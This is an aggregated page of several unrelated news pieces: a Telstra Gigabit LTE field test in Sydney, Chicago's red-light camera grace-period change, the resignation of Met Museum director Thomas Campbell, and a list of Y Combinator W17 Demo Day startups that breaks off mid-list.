Telstra’s state of the art FDD LTE network currently runs on four LTE channels, three being 20MHz wide (two contiguous 2600MHz Band 7, one 700MHz Band 28), and an additional 15MHz wide (1800MHz Band 3). That’s a massive 150MHz of dedicated and deployed LTE spectrum on what seems a tightly spaced cell grid, ensuring one-of-a-kind end user experience throughout the CBD. To put that into perspective, in the NYC market Verizon is dedicating a total of 90MHz of deployed LTE capacity on a macro grid originally spaced for CDMA 850MHz, although Verizon’s recent densification efforts have been admirable. Additionally, the estimated population of Sydney is roughly half of NYC’s, with population density 28 times lower than NYC’s. And with all that deployed LTE capacity, Telstra still has more than enough spectrum to operate two DC-HSPA+ layers (2100MHz Band 1 and 850MHz Band 5), and an additional Single Channel HSPA+. If that’s not enough capacity for you, an additional 900MHz Band 8 spectrum is readily available for refarming after the recent GSM network shutdown.

All Telstra’s multi-sector macro sites in Sydney’s CBD have been provisioned with 10Gbps fiber backhaul links, and unlike many operators around the globe, and especially here the U.S., Telstra has chosen to obtain the “full-speed” baseband licensing agreements at the eNodeB level, taking any potential artificial throttle imposed by the infrastructure vendor out of the picture. For many operators this type of a decision typically boils down to economics, but maintaining a global leadership position without sacrificing the highest possible quality of user experience happened to be the driving factor behind Telstra’s decision, and we salute them.

Just over a month ago, Telstra has started early trials of Evolved Multimedia Broadcast Multicast Service (eMBMS) throughout the market, currently allocating about 10% of spectrum resources in Band 28 for point-to-multipoint video broadcast. eMBMS is a feature defined in Release 8/9, and unlike unicast, it enables content (video, software updates, weather, news) delivery to unlimited amount of users at the same time, all sharing the same pre-allocated number of network resource blocks. In this case, eMBMS feature reduces the downlink data rates on Band 28 by 10%, but can be dynamically managed. eMBMS is a highly efficient way of distributing popular content to meet a clustered demand, typically large stadiums, arenas.

Ericsson is supplying the latest hardware and software (17A), and over the past 12 months Telstra and Ericsson have been hard at work upgrading cell sites with four-branch transmit and receive equipment needed for 4×4 MIMO operation on LTE Bands 3 and 7. Another unique feature rolled out throughout the market is Ericsson Lean Carrier (ELC). ELC is Ericsson’s own advanced solution taking page straight out of 5G NR study item, with the purpose of reducing inter-cell signaling interference and improving the utilization of advanced modulation techniques such as 256QAM. ELC is designed to suppress chatty signaling coming from neighboring sites during the quiet times (late night) when there is no user data transmission, which reduces interference, allows for more efficient spectrum utilization and ultimately higher data rates on active user terminals.

Netgear Nighthawk M1 is the first commercially available Category 16 LTE device, powered by Qualcomm Snapdragon X16 discrete LTE modem, and WTR5975 RF transceiver. The same Cat 16 modem is integrated into the Qualcomm Snapdragon 835 platform, and is expected to power many popular high end smartphones later this year. Qualcomm Snapdragon X16 LTE modem supports up to 4-Channel Carrier Aggregation,  Downlink 256QAM, and Nighthawk M1 LTE mobile router includes 4-way receive diversity (4RxD) antenna design for mid and high LTE bands, enabling 4×4 MIMO operation up to Rank 4, and allowing for peak download speeds of up to 1Gbps. Uplink 64QAM on all supported bands, and Uplink Carrier Aggregation (UL-CA) on two contiguous Band 7 component carriers is also supported, allowing for upload speeds of up to 150Mbps (Cat 13). Nighthawk M1 has USB Type-A and Type-C ports, Ethernet port, supports 802.11ac on both 2.4GHz and 5GHz, up to 80MHz wide channels. M1 users can configure the router using internal configuration page, or using a sleek mobile app developed by Netgear, which offers a more granular access to router settings, such as Radio Access Technology (RAT) preference and basic LTE Band locking feature.

Telstra has also supplied a Category 6 device (HTC’s Telstra Signature Premium) capable of aggregating two downlink component carriers with peak speeds of up to 300Mbps.

 

The network performance has been nothing short of stellar. In Circular Quay, one of the busiest tourist locations, we’ve achieved sustained downlink data rates of over 400Mbps, peaking at over 550Mbps. — Cellular Insights

Upload speeds were exceptional, leveraging UL-64QAM, and Uplink Carrier Aggregation (UL-CA) on two contiguous Band 7 component carriers, peaking at 113Mbps. Reaching these high upload speeds required locking the device to Band 7 Only, which limits the downlink performance to 2-Channel Carrier Aggregation, but enables the UL-CA. We are sure that higher data rates would’ve been possible had we tested during the quiet times.

During the peak hours at the same location, Telstra’s LTE network had no issues delivering sustained data rates of over 200Mbps, and uplink of over 80Mbps.

YouTube 4K videos would stream immediately and smoothly, and uploading 1GB file to Google Drive at 14MBps took just a little over a minute.

  • Combining results from all outdoor locations, Cat 16 device achieved speeds of 30Mbps for 85% of the time, vs 57% of the time on a Cat 6 device;
  • During the indoor testing at RSRP value of -100dBm or lower, Cat 16 device achieved speeds of 10Mbps for 89% of the time vs 37% of the time on the Cat 6 device;

 

Telstra’s LTE network isn’t a lab test or a limited demonstration of a Gigabit Class LTE capability. This is a fully functional, fully optimized, living and breathing commercial Gigabit Class LTE network, delivering an unmatched LTE performance in multiple markets, setting the bar almost impossibly high for all other operators around the world. We are extremely impressed with this first hand experience, and surely hope to pay another visit in the future, with field testing equipment by our side.

 

 

 

Close this section

Red-light camera grace period goes from 0.1 to 0.3 seconds, Chicago to lose $17M

In the wake of recommendations that were part of a recent study of its red-light cameras, the Chicago Department of Transportation has agreed to immediately increase the so-called “grace period”—the time between when a traffic light turns red to when a ticket is automatically issued.

Under the new policy, which was announced Monday, the grace period for Chicago’s red lights will move from 0.1 seconds to 0.3 seconds. This will bring the Windy City in line with other Americans metropolises, including New York City and Philadelphia. In a statement, the city agency said that this increase would “maintain the safety benefits of the program while ensuring the program’s fairness.”

On Tuesday, the Chicago Tribune reported that the city would lose $17 million in revenue this year alone as a result of the expanded grace period. Michael Claffey, a CDOT spokesman, confirmed that figure to Ars.

“We want to emphasize that extending this enforcement threshold is not an invitation to drivers to try to beat the red light,” CDOT Commissioner Rebekah Scheinfeld also said in the statement. “By accepting the recommendation of the academic team, we are giving the benefit of the doubt to well-intentioned drivers while remaining focused on the most reckless behaviors.”

According to the study, which was conducted by Northwestern University Transportation Center and funded by the city, Chicago has the largest installation of red-light cameras anywhere nationwide, with 306 cameras at 151 intersections. Until 2012, the network of cameras was operated by Redflex; however, an investigation by the Tribune found that the company’s interactions with Chicago officials were actually corrupt. The mayor booted Redflex out and gave the contract to Xerox instead—three federal prosecutions connected to Redflex quickly followed.

Close this section

Inside a Met Director's Exit

On February 4, The New York Times published an article by Robin Pogrebin that asked the startling question “Is the Met Museum ‘a Great Institution in Decline’?” In the piece Pogrebin quoted George Goldner, a longtime curator in the Met’s drawings and prints department, who had retired in 2015. “It’s a tragedy to see a great institution in decline,” Goldner told Pogrebin. “To have inherited a museum as strong as the Met was 10 years ago—with a great curatorial staff—and to have it be what it is today is unimaginable.” (Goldner now serves as an art adviser to billionaire buyout mogul Leon Black, whose wife is on the Met board.)

The article was “like an atomic bomb in the room,” says one former administrator at the Met. “You have to think hard to think of a public cultural institution that’s been denounced on the front page of The New York Times. I can’t remember that.”

Three weeks later Thomas Campbell, the director of the museum, resigned under pressure, effective June 30, a move that stunned the insular art world. The turn of events caught even Campbell by surprise, according to the former administrator. How did things go so wrong for this 54-year-old onetime wunderkind, who had come up through the ranks in the Met’s tiny tapestry department before succeeding Philippe de Montebello, the museum’s longtime aristocratic director, in 2009? How did things go wrong for the Met?

Founded in 1870, the Metropolitan Museum of Art is the largest art museum in America. It is arguably the world’s most important museum, with its encyclopedic collection representing the cultural and artistic history of mankind. Spanning four city blocks on Fifth Avenue and jutting into Central Park, the museum’s main building sprawls over two million square feet. Its neoclassical central façade, designed in 1895 by Richard Morris Hunt, is framed by gigantic columns atop a grand staircase, on which there always seems to be a busy, energetic crowd buzzing about. Inside, the sweeping collections of sculptures and paintings, weapons and armor, musical instruments, costumes, fashion art, and more—over two million artworks, total—are tended by curators and scholars in 17 different departments.

During its most recent fiscal year, the Met had 6.7 million visitors—the fifth consecutive year the museum had attracted more than 6 million people. It has an endowment of $2.5 billion—bigger than most colleges and universities. Revenue was roughly $390 million. In 2015, Moody’s awarded the Met’s $250 million bond issue to support “infrastructure improvements” its highest Aaa rating, and even though the museum’s total outstanding debt was $393 million, the ratings agency fairly gushed about the museum’s “exemplary brand recognition,” and its “excellent prospects” for continued “strong donor support.”

The Met’s trustees come from New York City’s wealthiest elites. According to the former administrator, the trustees have a combined net worth in excess of $500 billion. The Met board is the ultimate Establishment perch and status symbol. Over the years it has included such luminaries as Secretary of the Treasury Douglas Dillon, investment bankers André Meyer and Robert Lehman, TV Guide publisher Walter Annenberg, and Lazard Frères chairman Michel David-Weill. Today the board is populated by the current generation of New York society, including Annette de la Renta and Wall Street bigwigs John Paulson, Tony James, Tom Hill, Blair Effron, and Russell Carson. Daniel Brodsky, a real-estate developer, has been the board’s chairman since 2011.

The Met’s Great Hall.

By Benjamin Norman/The New York Times/Redux.

At first, Campbell’s fellow curators celebrated his ascension to the directorship. They were pleased that one of their own had again been selected to lead the tradition-bound institution. (De Montebello had served as an associate curator in the Department of European Paintings.) A graduate of Oxford, Campbell was described by The New Yorker as “irredeemably English.” Before joining the Met, in 1996, he worked for seven years for David and Simon Franses, renowned London tapestry dealers, where he became an expert in European tapestries. His nickname at the Met was “Tapestry Tom.”

The former Met administrator explains that while Campbell wasn’t one of the establishment curators, he also wasn’t a complete outsider. “He seemed like a good fit for the Met at the time. He was young and charming” and was seen “as an extremely good curator” and “a very bright guy who had his own ideas and was an independent actor.” The hope was that Campbell would satisfy the wishes of the increasing number of newer, younger trustees to modernize certain aspects of the museum—for instance, by making it seem less intimidating and more inviting to young people, by digitizing its massive collection, and by initiating a push into the collection and display of contemporary art—while also respecting the museum’s historic emphasis on scholarship and comprehensiveness.

“Tom would make people his anointed ones,” says a board member. “Then … ‘Oops, you’re no longer my anointed one.’ ”

But given Campbell’s narrow focus, in hindsight the obvious question is why, when he was being considered for the top job, the Met’s board didn’t delve more deeply into whether he had the necessary management skills and temperament to lead an “encyclopedic” museum with 2,500 employees.

“The feeling was that given the fact that the museum was in good shape and that Philippe had done a good job, given the strong leadership of the board, it was felt that Tom was just the right person because culture is so important at the Met,” explains a board member. “There are 17 curatorial departments. Each of them has its own priorities. It’s almost as if the director has 17 children. Some are bigger than others. Some are more demanding than others.”

Campbell’s first major test came in the aftermath of the 2008 financial crisis. As the stock market swooned, so did the value of the Met’s endowment, which shrank by a third. Donations plummeted, along with gate receipts. But the consensus seemed to be that Campbell acquitted himself honorably during this difficult period. “Overall, he handled that very well, especially as a beginner,” says the former administrator. “He came out of it looking like somebody who could manage a big institution.”

As the economy started to slowly recover, Campbell began to implement his strategic vision for the Met. “Then somehow things started to go awry,” says the former administrator. Campbell wanted to make the Met “new and trendy,” this person continues, and he started appointing people “who were more that way.” Indeed, under Campbell, 14 of the 17 heads of curatorial departments at the museum were either replaced or retired. “It tells you both that the director wants to turn over the applecart and also that there’s a certain dissatisfaction,” the former administrator adds. One widely panned misstep involved Campbell’s decision to redesign the Met’s simple logo—the capital letter M encased in an intricate design based on a woodcut by Luca Pacioli, a collaborator of Leonardo da Vinci’s—that had been a fixture since the 1970s. It was perhaps a small matter, but a highly visible one, and traditionalists thought the new, two-word scarlet logo, created by branding firm Wolff Olins—“The Met”—resembled a “red double-decker bus that has stopped short, shoving the passengers into each other’s backs,” according to New York magazine’s architecture critic.

Campbell also ordered up the redesign of the Met’s Web site, another move unlikely to please everyone, and it didn’t. Some of the curators complained that the site was being used mainly for “razzmatazz—fancy graphics and blogs, as opposed to putting the collection on it,” says the former administrator.

In a move that also upset many curators, Campbell directed considerable resources toward the new, “digital” department, according to the administrator—there were as many as 75 people working in it at an annual cost of around $20 million—dedicated to such projects as making it easier for visitors to use their mobile devices around the museum and beginning the arduous process of digitizing the museum’s collection of two million artworks. “There were more people working in the digital department than there were in any five or six other departments combined,” says the former administrator. “That was another big expenditure, and it tied together with this ever growing sense that the Met was going to be young and cool,” he says. “I think that it just got out of proportion.”

A view of Central Park; the Met is at bottom right.

© Herb Ling/aerialarchives.com.

Then there was the series of unfortunate events that began, in April 2013, with Leonard Lauder’s extraordinary gift of his unmatched collection of 78 Cubist paintings, drawings, and sculptures, among them 33 Picassos, 17 Braques, and 14 Légers—valued at more than $1 billion. “In one fell swoop this puts the Met at the forefront of early-20th-century art,” Campbell said at the time. “It is an un-reproducible collection, something museum directors only dream about.”

Leonard Lauder, along with his brother, Ronald, are the heirs to the Estée Lauder cosmetics fortune and also two of the city’s most important and philanthropic art collectors. “The idea was that [the Cubist artworks] would be shown together in the Leonard Lauder research-center area of the new contemporary wing,” says a Met source, “and that it be supported, intellectually and in a research way, by a center that would endow a particular [collection], built around a particular curator that Leonard liked very much by the name of Becca Rabinow. The interesting question is: did Lauder donate the art outright, or did he donate it predicated on the establishment of a center?” (Lauder denies there was any quid pro quo.)

According to the former administrator, Lauder got the better of Campbell over the terms and conditions of the donation. “If you put Leonard Lauder and Tom Campbell in the room in a negotiation, I don’t think Tom Campbell would emerge victorious,” this person says.

“The board voted to support the [new wing],” says a source, “but they didn’t vote with their wallets—just their pencils.”

In exchange for his gift, says the Met source, Lauder wanted the Met to delve more deeply into modern and contemporary art, a view shared by Campbell and a number of board members. According to The New York Times, Lauder “quietly masterminded” the Met’s takeover of the landmarked former Whitney Museum building, designed by the Hungarian brutalist architect Marcel Breuer. (In separate statements, Lauder said the Met’s use of the Breuer building “was in no way a condition of my gift,” and the Met said that plans for the project and for use of the Breuer building were finalized in 2011, “well before Mr. Lauder committed to making his gift.”) The Met agreed to lease the building for eight years—at a cost of $17 million per year—and to house its growing modern and contemporary collection there on an interim basis. The museum spent another estimated $13 million to renovate the Breuer building.

Previously, the Met had embarked on a $600 million project to demolish the existing Lila Acheson Wallace Wing, on Fifth Avenue, and to build a new wing, in the southwest corner of the museum’s footprint, which would double the size of the Roof Garden and house modern and contemporary art. In 2015, after a year-long study, the Met chose David Chipperfield Architects to design the new building, which was to be completed in 2020 to coincide with the museum’s 150th anniversary.

Some observers think the Met made a mistake in agreeing to build the new wing, to house Lauder’s Cubist collection. As a matter of principle, says Robert Storr, a professor at the Yale School of Art and a former senior curator at the Museum of Modern Art, “it’s one thing to accept such a collection. It’s another thing to accept that you’re going to have to increase the space of exhibition, given such treasures. . . . What makes a vital collection over long periods of time is not to have chapels to particular art, much less particular collections.”

What proved more problematic in the end was Campbell’s decision to initiate the project before he had secured the $600 million to fund it, and the cash was slow in coming. The board seemed reluctant to support the project financially. According to the former administrator, only the two Blackstone partners, Tony James and Tom Hill, stepped up, pledging $10 million each—but that still left the project far short of where it needed to be. (A Blackstone spokeswoman confirmed only that the two had made major cash donations to fund the Met Breuer.) In January the museum made the humiliating announcement that it was indefinitely postponing the new wing. (Shortly before he resigned, Campbell was said to be negotiating two $150 million gifts for the undertaking.) Sources say both Leonard Lauder and Steve Schwarzman, a co-founder of Blackstone, were asked for major gifts, although neither man is on the Met’s board. (Lauder would not respond to a request for comment. The Blackstone spokeswoman confirmed that Schwarzman had been approached for a large gift and declined.) “I think there is a certain amount of hypocrisy,” explains the former administrator. “The board voted to support the project, but they didn’t vote with their wallets—they just voted with their pencils. But when it comes down to writing checks, nobody is writing checks.”

Another important factor that caused the board to lose confidence in Campbell was the staff’s widespread dissatisfaction with his management style. “He would latch onto people and make them his anointed ones,” says one board member. “Then after a period of time, ‘Oops, you’re no longer my anointed one.’ ” The board member says this happened with Carrie Rebora Barratt, whom Campbell named associate director of collections and administration the year he took charge. Barratt went from being “the anointed one” to being out of favor with Campbell. “Then he changed his mind again, which was ‘Oh, she’s not as bad as I thought she was.’ As a leader you have to be consistent in your vision. You have to be consistent in execution. You have to be consistent with your team members.”

The board member adds, “Tom was on a mission and was not as sensitive to a lot of the interpersonal dynamics. Also, Tom was not a particularly good listener. You could have a meeting with him, and he always came in with his points, but usually when you have a meeting there’s a two-way equation. It goes back and forth. What I would say is that there were any number of meetings that I had with Tom, and I witnessed, where he was a participant in the meetings and he was—I don’t want to say tone-deaf, because that overstates it—but he wasn’t as sensitive to what was going on in the room as he might have been.” (A Met spokesman replies that, on the contrary, Campbell has promoted and appointed department heads with strong voices.)

Another problem was Campbell’s friskiness with certain women on the staff. He had been warned about it early in his tenure but still carried on. More recently a legal action was brought against him and the Met, but it was settled.

The former administrator says Campbell’s behavior was especially problematic because women make up three-quarters of the Met’s administrators. “A lot of them took umbrage at this,” this person says. “Inevitably this leads to the sort of grumbling where women who were not promoted or women who don’t advance for whatever reason are going to think it’s because they’re not the right type, they’re not his kind of girl—that sort of thing.”

Outgoing Met director Thomas Campbell and Leonard Lauder at the museum, photographed by Annie Leibovitz in 2013.

From Trunk Archive; For artwork details, go to VF.com/Credits.

In the end, what seems to have done Campbell in was the board’s increasing impatience with the state of the Met’s finances, despite its enviable endowment and credit rating. In recent years, the annual deficit had ranged between $4 million and $8 million, a relatively modest sum given the size of the endowment. The former administrator says that even under de Montebello the museum’s finances were always a bit of a “fast and loose” shell game, designed to show small losses. “They never wanted a large deficit, because it would look bad, and they never wanted a surplus, because they were afraid the donors wouldn’t give them money,” the person says. (The board’s chairman, Brodsky, replies that “the Met’s finances are managed responsibly. They are subject to internal and external audits and are published publicly in the annual report.” De Montebello could not be reached for comment.)

But that began to change for the worse under Campbell, especially after the Met payments on the Breuer, plus another $8.5 million in interest payments on the new bonds. Under Campbell, says the former administrator, “the budgetary looseness—which had always existed in principle—just went berserk.”

In order to save money, in April 2016 the Met announced a two-year “financial restructuring” plan, including staff cuts, hiring freezes, buyouts, and reduced programming. “We’ve had increasing pressure on the budget and knew that we were going to have to take actions to get it back in balance,” Campbell said at the time. In July, the Met announced that at least 100 employees, out of a workforce of 2,300, would be cut from the museum’s staff in an effort to reduce its $10 million deficit. At the time, Met president Dan Weiss said that without the cuts the Met’s shortfall would balloon to $40 million. In the end, only 34 non-curatorial employees were let go. Of the 159 employees eligible for a buyout—those who were more than 55 years old and had been at the Met for at least 15 years—56 took the offer, according to The New York Times. Staff members were even told they had to use a less expensive kind of pencil, according to the former administrator, who says, “Everything that wasn’t nailed down was being cut back or gotten rid of. I can tell you it was all anybody talked about. It was all the administration focused on for months and months and months.”

Morale plummeted. “I think it got to a point where the curators [disagreed with] some of the cost cuts, some of the decisions that were being made, some of the trade-offs and choices around where we were going to spend money at the Met,” the board member says.

The Met Breuer, formerly the Whitney Museum of American Art, in N.Y.C.

By Terese Loeb Kreuzer/Alamy.

One lingering question is how the board, made up of a Who’s Who of financial Masters of the Universe, could have let things get to the point of staff layoffs and hiring freezes. Some cite the genial nature of Henry Schacht, a partner at Warburg Pincus and, at the time, the head of the Met’s finance committee. “Henry is to my mind one of the nicer people one could meet,” says the former administrator, “but he didn’t want to rock any boats. He’s a very sweet guy. He’s a gentleman. He was a great believer that the director runs the museum and we have to support him…. Everything was O.K. when Philippe was there because Philippe knew enough to make sure everything came out O.K. in the end, and they developed this habit of just, O.K., Philippe can deal with it. But the problem was Tom couldn’t deal with it and he had these extravagant plans that Philippe didn’t have.” (Schacht declined comment. Tony James, Blackstone’s president and C.O.O., has since replaced him as finance-committee chairman.)

The day after Campbell resigned, The Art Newspaper published an interview with the former Met curator George Goldner, in which he elaborated on the observations he had made to The New York Times about the Met’s problems. Ironically, he had once been an enthusiastic supporter of Campbell’s, but his opinion of his onetime colleague had since soured. “It is unfortunate that the people who have been made to suffer are the staff,” he said. “A lot of people have been pushed out, some of whom were very good. Benefits have been reduced. Curatorial travel has been cut back. There is more pressure to limit the size of catalogues and exhibitions. I think they did a disservice to the institution because it’s impossible for Tom to improve morale in that kind of atmosphere. It is unconscionable that the pension of a person making $60,000 a year is cut through no fault of his or her own, whereas senior board members, who must in part take responsibility, have borne no part of the blame or burden.”

He said that, while he was no lover of contemporary art, he understood why Campbell bet the Met’s future on it, even if it proved to be his undoing. “I acknowledge there is no escaping it,” he said in the interview with The Art Newspaper. “Still, how can one explain spending $600 [million] to renovate the Modern and contemporary art wing? When the Met did the renovation of the Islamic galleries [in 2011], the total bill was much less—$50 [million]—and it was done beautifully. We are competing hard in the one field where we can’t possibly be the best in New York [because of the extensive modern-art collections at both the Museum of Modern Art and the Whitney]. Having a big center of modern art at the Met is like having a center of Italian paintings 20 blocks away from the Uffizi. Part of what has created the morale issue is that other departments have felt that their concerns have been relegated to a secondary position behind contemporary art and digital media.”

The former administrator says there are several morals to the story. One, this person says, is that “experience does matter.” He believes that the problems in Campbell’s personality came out only after he had become director, and that “if he had had a job as chief curator or a job as director of a museum before, one would have seen those things.”

Under de Montebello, a very strong leader, the museum had run like a well-oiled machine, but Campbell needed a stronger team under him to make up for his inexperience and to support his ambitious program to modernize the museum. The Met board member says, “I feel sorry for Tom Campbell, because not only did he walk into a whole bunch of buzz saws; he just didn’t have the experience to deal with a lot of key issues.”

“It’s not a very complicated story,” says a source close to the Met. “Tom was a curator. He was plucked out to run a big job—not just director but director and C.E.O. He forged an agenda with the board. He had some management issues. They together made all these decisions to get ahead on digital. Tom wasn’t on his own. They together decided to invest in modern and contemporary. The place is politically, totally insane. Along the way, whatever is going on among the board members about who’s up and who’s down, Tom obviously lost enough support there and he obviously lost curatorial support—the curators run the whole culture. And because he wasn’t a good manager, they urged him to leave and he resigned and that’s the story.”

Full ScreenPhotos:A Glimpse at Icons of Modern Art: The Shchukin Collection

Portrait of Dr. Félix Rey, by Vincent van Gogh, 1889.

Photo: From The Pushkin State Museum of Fine Arts, Moscow.

Woman with a Fan, by Pablo Picasso, 1908.

Photo: From The State Hermitage Museum, St. Petersburg/© Succession Picasso.

Woman with Rake, by Kazimir Malevich, circa 1932.

Photo: From The State Tretyakov Gallery, Moscow.

Nude, Black and Gold, by Henri Matisse, 1908.

Photo: From The State Hermitage Museum, St. Petersburg/© Succession H. Matisse.

Portrait of Dr. Félix Rey, by Vincent van Gogh, 1889.

From The Pushkin State Museum of Fine Arts, Moscow.

Woman with a Fan, by Pablo Picasso, 1908.

From The State Hermitage Museum, St. Petersburg/© Succession Picasso.

Woman with Rake, by Kazimir Malevich, circa 1932.

From The State Tretyakov Gallery, Moscow.

Nude, Black and Gold, by Henri Matisse, 1908.

From The State Hermitage Museum, St. Petersburg/© Succession H. Matisse.

Close this section

Startups that debuted at Y Combinator W17 Demo Day 2

Over 15,000 founders from 7,200 startups applied to this batch of Y Combinator. It chose just over 100 with founders from 22 countries to go through its accelerator program. Today, the second half of those companies launched on stage, and we have breakdowns of all 51 of these businesses.

Oh, and the ACLU. The 97-year old legal activism non-profit is far from a startup, but went through YC to learn more growth tactics.

Today’s set of companies focused on hardcore backend engineering tools and scrappy social apps. And thanks to YC’s recently developed Investor Match system, it’s able to route the startups and VCs most interested in each other into meetings.

Yesterday we covered the first 52 startups from this YC batch and shared our top 7 picks for the most promising companies. Later we’ll have our top picks from day 2, but for now here’s our writeups of the 51 startups that presented today.

Voodoo Manufacturing – A robotic 3D printing factory

Voodoo wants to be the AWS for manufacturing. It’s building a robotic factory of 3D printers so clients can send a digital file and get a physical product in return with no molds, labor, startup cost, or minimum order size. That massively democratizes access to manufacturing, the same way AWS did for cloud computing. It’s already working with Nike, Microsoft, Verizon, and Intel, and is on track to make $330,000 this quarter at a 65% margin. Voodoo is looking to disrupt the $50 billion plastic injection molding market, and grow it by making manufacturing as flexible as spinning up servers.

Read more about Voodoo Manufacturing on TechCrunch

 

Volt Health – An electrical stimulation medical device 

Volt is an electrostimulation wearable to treat diseases like incontinence. The founder has already taken six medical devices to market, including the Cool Sculpting device that sold for billions. Incontinence affects 25 million people and is a $25 billion market. The device stimulates the muscles to get them the give feedback to receptors. This helps those suffering from incontinence to not pee when they don’t want to. The device can also target other conditions like migraines and comes with proprietary technology.

 

Terark – Making databases faster

“We are the Pied Piper of databases, but we’re the real one” says Terark’s co-founder, alluding to HBO’s Silicon Valley show. Terark uses a special technology to dig data out of databases in a way that makes memory and hard disks more efficient. It claims to be faster than Google’s LevelDB and Facebook’s RocksDB database technologies, and has received a $1 million contract from Alibaba. With 10 years of experience in databases, Terark wants to steal a chunk of the $35 billion database market as all the information on Earth becomes digitized.

 

Wright Electric – Boeing for electric airplanes

Wright Electric wants to build the world’s first electric airplane. One of the main reasons airlines like Southwest can offer low fares is that they pre-purchase gas, but Wright sees an opportunity to make flights even cheaper by using electric planes instead. The company is targeting the 30 percent of all flights that are 300 miles or less, and partnering with EasyJet to start. As technology improves, it believes its planes will be able to go after the $26 billion short-haul flight market.

Read more about Wright Electric on TechCrunch

 

Speak – AI english tutor

People spend $90 billion a year on human english teachers that are expensive and ineffective. Speak offers a mobile app where you can have english conversations with your phone about real world scenarios like interviewing for a job or asking for directions. It uses speech recognition to identify english words through thick accents and teach people to speak more clearly. Meanwhile, it’s building a massive database of accented-english speech, which can be used to improve its system and other speech recognition systems. Speak’s team formerly built accent detection systems and sold Flashcards+ to Chegg. Though AI translation might reduce the need for people to know other languages, speaking English remains a valuable skill people are willing to pay for.

 

NanoNets – A machine learning API

Machine learning will change the way business is done, but like databases, most companies don’t build their own from scratch. NanoNets’ API makes it easy for any business to employe machine learning. They just upload their data, wait 10 minutes for it to be analyzed, and add a few lines of code. They can then start seeing results of automatic data mining via ML, such as being able to identify the brand of a shoe in photos. NanoNets is able to recycle learnings from previous jobs to reduce the amount of data it needs to do future tasks. It’s already seeing 1 million API calls a week, and sells a $99/month subscription with up to 10,000 API calls. By working with multiple clients, it can improve its systems much faster than any single client building ML technology by themselves.

 

Scribe – Automating sales development representatives

It’s tough for businesses to tell the difference between a high-potential sales lead and someone wasting their time. Scribe builds a smart inbound sales form for company website that uses data it receives and external data sources to instantly determine if it’s a “hot lead” that should immediately be routed to the right sales rep, or if its a “cold lead” that should be put on the back-burner. Scribe says its 50% cheaper and generates 20% more leads than hiring a sales development lead. It already has $10,000 in monthly recurring revenue just 3 weeks after launch, and after the $4 billion inbound sales market, it wants to attack the massive outbound sales opportunity,

 

Breaker – Making podcasts a real business

Most podcasts are free, but serious publishers are spending big budgets to make high quality audio content like Serial, which hit 100 million downloads and made podcasts mainstream. 67 million Americans are already listening to podcasts a month. Breaker wants to sign exclusive deals to distribute the best premium podcasts and charge users $6 per month. First, its goal is to build a huge listener audience by making the best podcast consumption app. It launched today, and will offer podcasters ways to connect and get feedback from their community, and analytics about what content performs best. It has a stunning 67% retention rate after a month for beta users. If it can convince people to pay for what’s often free, it could become the preferred place for podcasters to talk.

Bitrise – Automated build/test/deploy for mobile apps

Bitrise claims it can save developers one hour per day by automating unit tests, distributing tests to testers, and uploading apps to app stores every time the app’s code changes. Thanks to its open source integrations, you can connect any app like Slack for notifications and Hockey for beta tests. Bitrise already counts Microsoft and Xamarin as paying customers, and has $660,000 annual recurring revenue that’s growing 20% per month. And if things go right, it could become a hub where developers discover services that make their job easier.

 

Fibo – Mobile work tracking for construction teams

Fibo’s mobile app lets construction field teams keep work logs, time sheets, take photos of progress, and submit them to the boss’ office. It says it can save employees 4 hours of field paperwork per week, which could save their employers $4,000 a year. Customer retention is strong at a $30 per month per worker price point. With $10 million field workers in the US, there’s a $4 billion opportunity there. But using its construction worker engagement and data, next it could upsell services around workers comp and more. Construction was slow to adapt to tech, but now that every worker has a smartphone, there are new opportunities for startups like Fibo.

 

 

Paragon One – Career coaching from real professionals

Families spend a fortune on sending their kids to college, and many students end up going into debt, but they still aren’t prepared for the job market. College career centers are often unhelpful. Paragon One thinks the answer is skill and interview prep coaching from professionals who already got themselves jobs at top companies like Apple and Google. Families pay $7500 up front, and the kids get coaching over video chat. Paragon One says 100% of students who completed the program got job or internship offers. It’s now doing $55,000 in monthly revenue with 56% unit profit margin after customer acquisition costs, and it’s growing 40% monthly. While the price might seem steep, there are 2 million students each year not on financial aid, and their families end up paying around $200,000 for college that doesn’t guarantee a job. Paragon One could use a little extra career guidance and interview prep to leverage that sunk cost investment and get kids lucrative jobs.

Tress – A social community for black women’s hairstyles

Tress says black women spend 9X more on their hair than any other demographic, with the worldwide black hair care market estimated at $500 billion a year. The process of changing hairstyles includes inspiration on social networks, YouTube tutorials, booking stylists, and buying hair care products. Tress wants to bring these all into one product. It says it now has 30,000 weekly active users and is growing 20% week over week. With users frequently sharing the hairstyles they discover on Tress, it has a built-in growth mechanic.

Bicycle AI – Automated AI customer support

Bicycle is a full-stack customer support service that uses AI to answer customer questions 24/7. The startup says it can eliminate 60-80% of level 1 support cases for $3 per case, earning it am 80% margin. It’s already handled 75,000 conversations with 5 beta customers with a 30-second response time, and it’s growing 20% per week. Since it’s a full-stack service, not just a tool, it can charge much more, and AI makes sure wrong answers don’t reach customers. Support is a massive market where AI could replace costly call center workers.

Vize Software – Self-Serve Palantir

Visualizing data is harder than it should be. Vize makes software that creates beautiful and interactive data visualizations that can be edited on the fly. Businesses can change values of their data right in the charts. That’s extremely useful for businesses researching what-if scenarios. It’s racked up $450,000 in annual recurring revenue in 3 months, and has clients like KPMG and the French Ministry Of Defense. Every business is becoming data driven, and Vize lets them see what they’re doing.

Simple Habit – Netflix for meditation

Americans spent $1 billion on meditation in 2015, and $2 billion in 2016. This is the beginning of a mindfulness movement that Simple Habit wants to monetize. Simple Habit’s founder Yunha Kim was burned out after selling her last startup Locket. She found that most meditation apps only offer a few meditation programs or teachers. So she left Stanford’s business school to build Simple Habit, which has 60 teachers with 1000 topics. That way, you can get purpose-made content to help you get to sleep, relieve stress, or prepare to speak in public. It’s grown to $600,000 in annual recurring revenue since launching six months ago. Yoga went from a niche activity to a huge business in a few years, and now meditation is starting that same hockey-stick moment.

Snappr – On-demand pro photographers

Photography services is a $30 billion market, but the experience involves annoying comparison shopping, frustrating scheduling and delays, and high prices. Snappr lets you instead book a pre-vetted photographer through its app in just a minute and can soon be shooting photos at $59 an hour. Snappr can charge so little because most photographers waste a ton of time trying to book gigs rather than working them, but Snappr routes jobs to them automatically. It’s growing 75% per month and has a $1 million run rate thanks to customers like Uber and Groupon who use it to shoot product photography. Snappr wants to be the Uber of photography, taking a hyper-fragmented market of individual workers and giving them a logistics too to maximize the hours they spend getting paid.

IQBoxy – Software that replaces human bookkeepers

